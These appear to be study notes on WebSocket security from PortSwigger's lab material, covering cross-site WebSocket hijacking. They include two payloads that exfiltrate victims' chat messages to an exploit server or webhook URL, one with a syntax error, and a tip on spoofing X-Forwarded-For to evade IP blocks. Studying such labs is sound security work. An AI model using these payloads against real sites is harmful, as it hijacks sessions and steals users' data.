Web Socket Vulnerability
https://portswigger.net/web-security/websockets/what-are-websockets
What is the difference between HTTP and WebSockets?
Most communication between web browsers and web sites uses HTTP. With HTTP, the client
sends a request and the server returns a response. Typically, the response occurs immediately,
and the transaction is complete. Even if the network connection stays open, this will be used for
a separate transaction of a request and a response.
Some modern web sites use WebSockets. WebSocket connections are initiated over HTTP and
are typically long-lived. Messages can be sent in either direction at any time and are not
transactional in nature. The connection will normally stay open and idle until either the client or
the server is ready to send a message.
WebSockets are particularly useful in situations where low-latency or server-initiated messages
are required, such as real-time feeds of financial data.
Cross-site WebSocket hijacking
What is cross-site WebSocket hijacking?
Cross-site WebSocket hijacking (also known as cross-origin WebSocket hijacking) involves a
cross-site request forgery (CSRF) vulnerability on a WebSocket handshake. It arises when the
WebSocket handshake request relies solely on HTTP cookies for session handling and does not
contain any CSRF tokens or other unpredictable values.
An attacker can create a malicious web page on their own domain which establishes a cross-site
WebSocket connection to the vulnerable application. The application will handle the connection
in the context of the victim user's session with the application.
The attacker's page can then send arbitrary messages to the server via the connection and read the
contents of messages that are received back from the server. This means that, unlike regular
CSRF, the attacker gains two-way interaction with the compromised application.
The below payload is a port swigger CSRF web socket it use only cookie to validate which is
also set to same site none
�<script>
var ws = new
WebSocket('wss://0a43009403946ced80bd8564004f003e.web-security-
academy.net/chat');
ws.onopen = function() {
ws.send("READY");
};
ws.onmessage = function(event) {
fetch('https://exploit-
0af9007403d66c91807a849f010b0095.exploit-server.net/log?msg=' +
encodeURIComponent(event.data));
};
</script>
[OR]
<script>
var ws = new
WebSocket('wss://0aba004704633d69804fa326000f00b2.web-security-
academy.net/chat');
ws.onopen = function() {
ws.send("READY"); // Sends a message to the WebSocket server
upon connection
};
ws.onmessage = function(event) {
fetch('https://webhook.site/xxxxxxxxxxxxxxxxx’ {
method: 'POST',
mode: 'no-cors',
body: event.data
});
};
</script>
�Manipulating the web socket handshake
When the web socket is blocking the IP address. we can use X-Forwarded-For: 1.1.1.1 proxy
the request
To send xss payloads
